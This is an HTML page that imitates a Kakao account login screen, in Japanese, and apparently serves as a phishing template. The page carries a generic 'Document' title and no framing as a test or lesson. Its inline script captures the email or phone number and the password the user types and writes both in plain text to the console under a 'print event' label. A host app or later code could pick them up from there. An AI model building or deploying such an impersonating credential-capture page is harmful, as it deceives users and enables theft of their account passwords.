<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css">
    <style>
        body {
            letter-spacing: -1px;
        }

        header {
            text-align: center;
            border-bottom: 1px solid #b2b2b2;
            padding: 15px;
            margin-bottom: 50px;
        }

        section {
            padding: 20px;
        }

        .input {
            width: 100%;
            padding: 8px;
            padding-left: 0;
            border: 0;
            border-bottom: 1px solid #e5e5e5;
            margin-bottom: 15px;
        }

        .input:focus {
            border-color: #252525;
        }

        .button {
            width: 100%;
            padding: 10px;
            border: 0;
            border-radius: 2px;
            background-color: #fae54d;
            color: #252525;
            font-weight: 600;
            margin-bottom: 25px;
        }

        .button:disabled {
            background-color: #f6f6f6;
            color: #959595;
        }
    </style>
</head>
<body>
    <form onsubmit="return false">
        <header>
            <span style="margin-left: 60px;font-weight: 600;"> ログイン </span>
            <span style="float: right;font-weight: 600;font-size: 12px;margin-top: 5px;"> キャンセル </span>
        </header>
        <section>
            <input type="text" class="input" id="login" name="login" placeholder="Eメール、または電話番号" autocomplete="off">
            <input type="password" class="input" id="password" name="password" placeholder="パスワード" autocomplete="off">

            <input type="submit" class="button" id="sendData" disabled value="ログイン">

            <p style="font-size: 14px;text-align: center;margin-bottom: 25px;"> <u> お忘れのアカウント情報? </u> </p>

            <div style="text-align: center;">
                <span style="font-size: 14px;text-align: center;border: 1px solid #e6e6e7;padding: 5px 15px;border-radius: 25px;"> 新しいKakaoアカウントを作成する </span>
            </div>
        </section>
    </form>
    <script>
        var login = document.getElementById('login'),
            password = document.getElementById('password');

        var sendData = document.getElementById('sendData');

        function check() {
            if(login.value.length >= 4 && password.value.length >= 4) {
                sendData.disabled = false
            } else {
                sendData.disabled = true
            }
        }

        login.onkeyup = () => {
            check()
        }

        password.onkeyup = () => {
            check()
        }

        sendData.onclick = () => {
                console.log('print event: ' + login.value + ' : ' + password.value)
        }
    </script>
</body>
</html>